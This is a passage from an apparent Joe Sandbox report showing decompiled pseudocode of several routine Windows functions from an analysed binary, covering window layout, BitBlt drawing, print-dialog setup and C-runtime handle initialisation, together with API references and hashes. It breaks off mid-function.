Instruction Fuzzy Hash: 38D05B31B42330EFC66027A4BD0D69A7B54DB08B6579502B7782ED22D0CBF85C4187ED

Uniqueness

Uniqueness Score: -1.00%

Function 0041F691, Relevance: 7.8, APIs: 5, Instructions: 339
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E0041F691(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				long _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				intOrPtr _t150;
				intOrPtr* _t155;
				intOrPtr _t161;
				void* _t162;
				signed int _t165;
				signed int _t167;
				signed int _t171;
				signed int _t173;
				long _t191;
				intOrPtr* _t198;
				intOrPtr* _t200;
				long _t202;
				intOrPtr* _t209;
				intOrPtr* _t211;
				intOrPtr* _t214;
				long _t216;
				void* _t219;
				signed char _t222;
				intOrPtr _t225;
				intOrPtr _t236;
				intOrPtr _t242;
				char* _t248;
				struct tagRECT* _t263;
				intOrPtr* _t279;
				signed int _t281;
				long _t283;
				void* _t287;
				intOrPtr _t291;
				intOrPtr _t308;

				_t219 = __ecx;
				 *((intOrPtr*)(__ecx + 0x88)) = 1;
				E0041FF70(__ecx);
				_t279 = __ecx + 0x84;
				if((E0041A275( *((intOrPtr*)(__ecx + 0x84))) & 0x00000001) != 0) {
					E0041A2AB( *_t279, 0);
				}
				_t150 =  *((intOrPtr*)(_t219 + 0x68));
				_t222 =  *(_t150 + 0x64);
				if((_t222 & 0x00000004) == 0) {
					if((_t222 & 0x00000002) == 0) {
						GetWindowRect( *(_t150 + 0x1c),  &_v44);
						_t281 =  *(_t219 + 0x78) & 0x0000a000;
						 *((intOrPtr*)(_t219 + 4)) = _a4;
						asm("sbb edx, edx");
						 *((intOrPtr*)(_t219 + 8)) = _a8;
						_t248 =  &_v20;
						_t155 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))(_t248, 0xffffffff, ( ~_t281 & 0x00000006) + 0xa);
						_t225 =  *_t155;
						_v8 =  *((intOrPtr*)(_t155 + 4));
						if(_t281 == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t283 = _v44.left;
							asm("cdq");
							_v20 = _t225 + _t283;
							_v28 = _t283;
							_t250 = _v44.right - _t283 - _t248 >> 1;
							_t161 = _a8 - (_v44.right - _t283 - _t248 >> 1);
							_v24 = _t161;
							_v16 = _v8 + _t161;
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t291 = _v44.top;
							_v24 = _t291;
							asm("cdq");
							_t250 = _v44.bottom - _t291 - _t248 >> 1;
							_t191 = _a4 - (_v44.bottom - _t291 - _t248 >> 1);
							_v28 = _t191;
							_v20 = _t225 + _t191;
							_v16 = _v8 + _t291;
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t162 = _t219 + 0x48;
						_push(0);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t287 = 0xc40000;
						_push(0xc40000);
					} else {
						GetWindowRect( *(_t150 + 0x1c),  &_v60);
						 *((intOrPtr*)(_t219 + 4)) = _a4;
						 *((intOrPtr*)(_t219 + 8)) = _a8;
						_t198 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0xa);
						_t200 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0x10);
						_t236 = _v60.top;
						_v44.top = _t236;
						_v44.bottom =  *((intOrPtr*)(_t198 + 4)) + _t236;
						_v16 =  *((intOrPtr*)(_t200 + 4));
						_t202 = _v60.left;
						_v44.right =  *_t198 + _t202;
						_v44.left = _t202;
						_t250 =  *_t200 + _t202;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v44.left = _t202;
						_v44.right =  *_t200 + _t202;
						_v44.top = _t236;
						_v44.bottom = _v16 + _t236;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						goto L6;
					}
				} else {
					GetWindowRect( *(_t150 + 0x1c),  &_v60);
					 *((intOrPtr*)(_t219 + 4)) = _a4;
					 *((intOrPtr*)(_t219 + 8)) = _a8;
					_t209 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0xa);
					_t211 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0x10);
					_v12 =  *_t211;
					_v8 =  *((intOrPtr*)(_t211 + 4));
					_t214 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 6);
					_t242 = _v60.top;
					_v44.top = _t242;
					_v44.bottom =  *((intOrPtr*)(_t209 + 4)) + _t242;
					_v16 =  *((intOrPtr*)(_t214 + 4));
					_t216 = _v60.left;
					_v44.right =  *_t209 + _t216;
					_v44.left = _t216;
					_t250 =  *_t214 + _t216;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.left = _t216;
					_v44.right = _v12 + _t216;
					_v44.top = _t242;
					_v44.bottom = _v8 + _t242;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t308 = _v16 + _t242;
					_v44.left = _t216;
					_v8 = _t308;
					_v44.bottom = _t308;
					_v44.right = _t250;
					_v44.top = _t242;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.left = _t216;
					_v44.right = _t250;
					_v44.top = _t242;
					_v44.bottom = _v8;
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t287 = 0xc40000;
					_push(0);
					_push(0xc40000);
					_t162 = _t219 + 0x48;
				}
				_push(_t162);
				E004239AC();
				_push(0);
				_t263 = _t219 + 0x58;
				_push(_t287);
				_push(_t263);
				E004239AC();
				_t165 =  *0x439bf4; // 0x2
				_t167 =  *0x439bf0; // 0x2
				InflateRect(_t219 + 0x48,  ~_t167,  ~_t165);
				_t171 =  *0x439bf4; // 0x2
				_t173 =  *0x439bf0; // 0x2
				InflateRect(_t263,  ~_t173,  ~_t171);
				_t264 = _a8;
				_t289 = _a4;
				E0041F5D0(_t219 + 0x28, _a4, _a8);
				E0041F5D0(_t219 + 0x38, _a4, _a8);
				E0041F5D0(_t219 + 0x48, _t289, _t264);
				E0041F5D0(_t219 + 0x58, _t289, _t264);
				 *((intOrPtr*)(_t219 + 0x74)) = E004201E2();
				E0041F9E4(_t219, _t289, _t264);
				return E00420341(_t219, _t250);
			}

APIs

Part of subcall function 0041FF70: PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0041FF8D
Part of subcall function 0041FF70: GetMessageA.USER32 ref: 0041FF9B
Part of subcall function 0041FF70: DispatchMessageA.USER32 ref: 0041FFAE
Part of subcall function 0041FF70: SetRectEmpty.USER32(?), ref: 0041FFD7
Part of subcall function 0041FF70: GetDesktopWindow.USER32 ref: 0041FFEF
Part of subcall function 0041FF70: LockWindowUpdate.USER32(?,00000000,?,00000000,0000000F,0000000F,00000000), ref: 00420000
Part of subcall function 0041FF70: GetDCEx.USER32(?,00000000,00000003,?,00000000,0000000F,0000000F,00000000), ref: 00420017

Part of subcall function 0041A275: GetModuleHandleA.KERNEL32(GDI32.DLL,?,0041F6BC), ref: 0041A27D
Part of subcall function 0041A275: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0041A289

GetWindowRect.USER32 ref: 0041F6DF

Part of subcall function 0041A2AB: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,0041F6C9,00000000), ref: 0041A2B4
Part of subcall function 0041A2AB: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 0041A2C2

GetWindowRect.USER32 ref: 0041F7CC

Part of subcall function 0041F5D0: OffsetRect.USER32(?,?,?), ref: 0041F607

Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA0D
Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA17
Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA21
Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA2B

Part of subcall function 00420341: GetCapture.USER32 ref: 00420352
Part of subcall function 00420341: SetCapture.USER32(?), ref: 00420362
Part of subcall function 00420341: GetCapture.USER32 ref: 0042036E
Part of subcall function 00420341: GetMessageA.USER32 ref: 00420388
Part of subcall function 00420341: DispatchMessageA.USER32 ref: 004203BA
Part of subcall function 00420341: GetCapture.USER32 ref: 00420418

GetWindowRect.USER32 ref: 0041F879
InflateRect.USER32(?,00000002,00000002), ref: 0041F97C
InflateRect.USER32(?,00000002,00000002), ref: 0041F98F

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Rect$MessageOffsetWindow$Capture$AddressDispatchHandleInflateModuleProc$DesktopEmptyLockPeekUpdate
String ID:
API String ID: 2041477333-0
Opcode ID: a6936e3c0a7907dd6ed1964909c9b8db90eacfd9e582db4c5833aae79c6c69c9
Instruction ID: 42ddb03621f51a7623203be26b69d0316b25f3a5275469d587ef5c4032a932e9
Opcode Fuzzy Hash: a6936e3c0a7907dd6ed1964909c9b8db90eacfd9e582db4c5833aae79c6c69c9
Instruction Fuzzy Hash: 55D13671A006199FCF04CF98C880ADEBBB6EF49310F1581AAED05BB255D7B1AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004041B5, Relevance: 7.7, APIs: 5, Instructions: 237
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004041B5(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, signed int _a36, signed int _a40) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t131;
				signed int _t230;
				void* _t267;

				if(_a40 < 4) {
					_a40 = 4;
				}
				asm("cdq");
				_v8 = _a28 / _a40 + 1;
				_t131 = _a32;
				asm("cdq");
				_t230 = _t131 % _a40;
				_v12 = _t131 / _a40 + 1;
				_v16 = 0;
				while(1) {
					asm("cdq");
					if(_v16 >= _v12 - _t230 >> 1) {
						break;
					}
					_v20 = 0;
					while(_v20 < _v8 - _v16) {
						BitBlt(_a16, _a20 + _v20 * _a40, _a24 + _v16 * _a40, _a40, _a40, _a4, _a8 + _v20 * _a40, _a12 + _v16 * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 + 1;
					}
					_v20 = 0;
					while(_v20 < _v12 - _v16) {
						BitBlt(_a16, _a20 + _a28 - (_v16 + 1) * _a40, _a24 + _v20 * _a40, _a40, _a40, _a4, _a8 + _a28 - (_v16 + 1) * _a40, _a12 + _v20 * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 + 1;
					}
					_v20 = _v8 - _v16;
					while(_v20 >= 0) {
						BitBlt(_a16, _a20 + (_v20 - 1) * _a40, _a24 + _a32 - (_v16 + 1) * _a40, _a40, _a40, _a4, _a8 + (_v20 - 1) * _a40, _a12 + _a32 - (_v16 + 1) * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 - 1;
					}
					_v20 = _v12 - _v16;
					while(_v20 >= 0) {
						BitBlt(_a16, _a20 + _v16 * _a40, _a24 + (_v20 - 1) * _a40, _a40, _a40, _a4, _a8 + _v16 * _a40, _a12 + (_v20 - 1) * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 - 1;
					}
					_v16 = _v16 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				return 1;
			}

APIs

BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,00000000,00CC0020), ref: 00404260
BitBlt.GDI32(?,?,?,00000004,00000004,?,?,00000000,00CC0020), ref: 004042E6
BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,?,00CC0020), ref: 0040436F
BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,00000000,00CC0020), ref: 004043EC
BitBlt.GDI32(?,?,?,?,?,?,00000000,?,00CC0020), ref: 00404433

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4852f428c49f7dbf2d34c0264fcda9c88eb02544480e12d11db3c71bda218985
Instruction ID: 29e2845c1fd78097f43836e8b5be001507bced236b49523afccdde5b5024b9e6
Opcode Fuzzy Hash: 4852f428c49f7dbf2d34c0264fcda9c88eb02544480e12d11db3c71bda218985
Instruction Fuzzy Hash: 1EA197B1A001099FCB08CFACC995AEEB7B9FF88308F158659F919A7244D734E915CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0042669F, Relevance: 7.7, APIs: 5, Instructions: 152
stringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0042669F(void* __ecx) {
				intOrPtr _t67;
				void* _t69;
				void* _t72;
				CHAR** _t77;
				intOrPtr _t90;
				signed int _t112;
				void* _t117;
				void* _t129;
				intOrPtr* _t132;
				signed short* _t134;
				intOrPtr* _t135;
				intOrPtr* _t136;
				void* _t137;

				E00406520(E00429D12, _t137);
				_t129 = __ecx;
				if( *((intOrPtr*)(_t137 + 8)) != 0) {
					L20:
					_push(0);
					_push(0x14000c);
					_push(1);
					E0041009E(_t137 - 0x160);
					 *(_t137 - 4) = 2;
					E0041030E(_t137 - 0x160);
					_t65 =  *((intOrPtr*)(_t129 + 0x94));
					if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
						E0041A92B(_t65);
					}
					_t66 =  *((intOrPtr*)(_t129 + 0x98));
					_t132 = _t129 + 0x98;
					if( *((intOrPtr*)(_t129 + 0x98)) != 0) {
						E0041A92B(_t66);
					}
					_t67 =  *((intOrPtr*)(_t137 - 0x104));
					 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t129 + 0x94)) =  *((intOrPtr*)(_t67 + 8));
					 *_t132 =  *((intOrPtr*)(_t67 + 0xc));
					_t117 = _t137 - 0x160;
					L25:
					_t69 = E00411D13(_t117);
					L26:
					 *[fs:0x0] =  *((intOrPtr*)(_t137 - 0xc));
					return _t69;
				}
				_t72 =  *(__ecx + 0x98);
				if(_t72 == 0) {
					goto L20;
				}
				_t69 = GlobalLock(_t72);
				_t134 = _t69;
				if((_t134[3] & 0x00000001) == 0) {
					goto L26;
				}
				_push(0);
				_push(0x14000c);
				_push(1);
				E0041009E(_t137 - 0xbc);
				 *(_t137 - 4) = 0;
				E0041030E(_t137 - 0xbc);
				if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
					_t77 = E00410255(_t137 - 0xbc, _t137 - 0x10);
					 *(_t137 - 4) = 1;
					if(lstrcmpA(_t134 + ( *_t134 & 0x0000ffff),  *_t77) != 0) {
						L10:
						_t112 = 1;
						L11:
						 *(_t137 - 4) =  *(_t137 - 4) & 0x00000000;
						E00416AEC(_t137 - 0x10);
						if(_t112 == 0) {
							_t83 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8));
							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8)) != 0) {
								E0041A92B(_t83);
							}
							_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc));
							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
								E0041A92B(_t85);
							}
						} else {
							_t88 =  *((intOrPtr*)(_t129 + 0x94));
							_t135 = _t129 + 0x94;
							if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
								E0041A92B(_t88);
							}
							E0041A92B( *((intOrPtr*)(_t129 + 0x98)));
							_t90 =  *((intOrPtr*)(_t137 - 0x60));
							 *_t135 =  *((intOrPtr*)(_t90 + 8));
							 *((intOrPtr*)(_t129 + 0x98)) =  *((intOrPtr*)(_t90 + 0xc));
						}
						L19:
						 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
						_t117 = _t137 - 0xbc;
						goto L25;
					}
					 *((char*)(_t137 + 0xb)) = lstrcmpA(_t134 + (_t134[1] & 0x0000ffff),  *(E00410292(_t137 - 0xbc, _t137 - 0x14))) != 0;
					E00416AEC(_t137 - 0x14);
					if( *((char*)(_t137 + 0xb)) != 0) {
						goto L10;
					}
					_t112 = lstrcmpA & 0xffffff00 | lstrcmpA(_t134 + (_t134[2] & 0x0000ffff),  *(E004102D0(_t137 - 0xbc, _t137 - 0x18))) != 0x00000000;
					E00416AEC(_t137 - 0x18);
					if(_t112 == 0) {
						goto L11;
					}
					goto L10;
				}
				_t105 =  *((intOrPtr*)(_t129 + 0x94));
				_t136 = _t129 + 0x94;
				if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
					E0041A92B(_t105);
				}
				E0041A92B( *((intOrPtr*)(_t129 + 0x98)));
				 *_t136 = 0;
				 *((intOrPtr*)(_t129 + 0x98)) = 0;
				goto L19;
			}

APIs

__EH_prolog.LIBCMT ref: 004266A4
lstrcmpA.KERNEL32(00000000,00000000,?,00000001,0014000C,00000000), ref: 00426758
lstrcmpA.KERNEL32(?,00000000,?), ref: 00426776
lstrcmpA.KERNEL32(?,00000000,?,?), ref: 004267A4

Part of subcall function 0041A92B: GlobalFlags.KERNEL32(?), ref: 0041A935
Part of subcall function 0041A92B: GlobalUnlock.KERNEL32(?,?,?,0042421F,?,?,?,?,0040199F,00437BE8,?,004013A2), ref: 0041A94C
Part of subcall function 0041A92B: GlobalFree.KERNEL32 ref: 0041A957

GlobalLock.KERNEL32 ref: 004266CE

Part of subcall function 0041009E: __EH_prolog.LIBCMT ref: 004100A3

Part of subcall function 0041030E: PrintDlgA.COMDLG32(?,0042684E,00000001,0014000C,00000000,?,?,00000000), ref: 00410318

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Global$lstrcmp$H_prolog$FlagsFreeLockPrintUnlock
String ID:
API String ID: 2564375162-0
Opcode ID: 653e2c81b0d72e161c244adbd25edb8e30c70488008d71227ddbd14f21ca4b2e
Instruction ID: dab6b3ac01e2e209cde5cdaaba7fbabb505c74ae40abd7d4cd101a1c9b428fb9
Opcode Fuzzy Hash: 653e2c81b0d72e161c244adbd25edb8e30c70488008d71227ddbd14f21ca4b2e
Instruction Fuzzy Hash: E851A070B002269BCB14EF75D885FDAB7B8BF01308F41446EE559A3292DB38ED94CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040963B, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E0040963B() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E00405667(0x480);
				if(_t89 == 0) {
					E00406490(0x1b);
				}
				 *0x43b520 = _t89;
				 *0x43b620 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x43b520; // 0x7048c0
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x43b520; // 0x7048c0
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x43b620);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x43b620 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x43b520[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x43b524;
					while(1) {
						_t69 = E00405667(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x43b620 =  *0x43b620 + 0x20;
						__eflags =  *0x43b620;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x43b620 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x43b620; // 0x20
					goto L18;
				}
			}

APIs

GetStartupInfoA.KERNEL32(?), ref: 00409699
GetFileType.KERNEL32(?,?,00000000), ref: 00409744
GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004097A7
GetFileType.KERNEL32(00000000,?,00000000), ref: 004097B5
SetHandleCount.KERNEL32 ref: 004097EC

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: ecd1a007bcd950c4f6a802b73a84018a70199882e3a03b2a3ff8f6cc88cac146
Instruction ID: 8f3487591cd982a3eb9725f147ad5950e145dc92a1b9c359c43610153c7b6e5a
Opcode Fuzzy Hash: ecd1a007bcd950c4f6a802b73a84018a70199882e3a03b2a3ff8f6cc88cac146
Instruction Fuzzy Hash: F8510832514605CBD7208F38C884B7677E0EB05368F28467ED596EB3E2D7389C06C759

Uniqueness

Uniqueness Score: -1.00%

Function 0042722C, Relevance: 7.6, APIs: 5, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0042722C(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v20;
				void* __ebp;
				intOrPtr* _t51;
				intOrPtr _t54;
				int _t58;
				signed int _t65;
				int _t77;
				void* _t79;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				int _t84;
				void* _t88;
				int _t91;
				signed int _t100;
				signed int _t104;
				void* _t109;
				struct tagRECT* _t110;

				_t88 = __ecx;
				_t104 = _a4 + _a4 * 4 << 3;
				_t109 = _t104 +  *((intOrPtr*)(__ecx + 0x90));
				_t51 = E004271A8(__ecx, __edx, __eflags,  &_v20);
				_v12 =  *_t51;
				_v8 =  *((intOrPtr*)(_t51 + 4));
				_t91 =  *(_t109 + 0x24);
				_t100 = 0 |  *(_t109 + 0x20) - _t91 < 0x00000000;
				_t54 =  *((intOrPtr*)(__ecx + 0xec));
				if(_t54 == 0) {
					 *(_t109 + 0x18) =  *(_t109 + 0x20);
					 *(_t109 + 0x1c) =  *(_t109 + 0x24);
					L12:
					_v20 = MulDiv( *(_t109 + 0x10),  *(_t109 + 0x18),  *(_t109 + 0x1c));
					_t58 = MulDiv( *(_t109 + 0x14),  *(_t109 + 0x18),  *(_t109 + 0x1c));
					_t110 = _t104 +  *((intOrPtr*)(_t88 + 0x90));
					SetRect(_t110, 8, 8, _v20 + 0xb, _t58 + 0xb);
					if( *((intOrPtr*)(_t88 + 0xec)) != 0) {
						_push(0x42e4b0);
						_t65 = _t110->right - _t110->left + 0x10;
						__eflags = _t65;
						_push( &_v12);
						_push(_t110->bottom - _t110->top + 0x10);
						_push(_t65);
						_push(1);
						return E0041AE9C(_t88, _t65);
					}
					asm("cdq");
					asm("cdq");
					_t77 = OffsetRect(_t110, (_v12 - _t110->right - _t110->left - _t100 >> 1) - 1, (_v8 - _t110->bottom - _t110->top - _t100 >> 1) - 1);
					if(_a4 != 1) {
						return _t77;
					}
					return OffsetRect(_t110,  *(_t88 + 0xfc), 0);
				}
				_t79 = _t54 - 1;
				if(_t79 == 0) {
					__eflags = _t100;
					 *(_t109 + 0x1c) = _t91;
					_t80 =  *(_t109 + 0x20);
					if(_t100 == 0) {
						_t82 = _t80 + _t80 * 2 - _t91;
					} else {
						_t82 = _t80 + _t91;
						__eflags = _t82;
					}
					asm("cdq");
					_t83 = _t82 - _t100;
					__eflags = _t83;
					_t84 = _t83 >> 1;
					L9:
					 *(_t109 + 0x18) = _t84;
					goto L12;
				}
				if(_t79 != 1) {
					goto L12;
				}
				if(_t100 == 0) {
					 *(_t109 + 0x1c) = _t91;
					_t84 = ( *(_t109 + 0x20) << 1) -  *(_t109 + 0x24);
				} else {
					_t84 = 1;
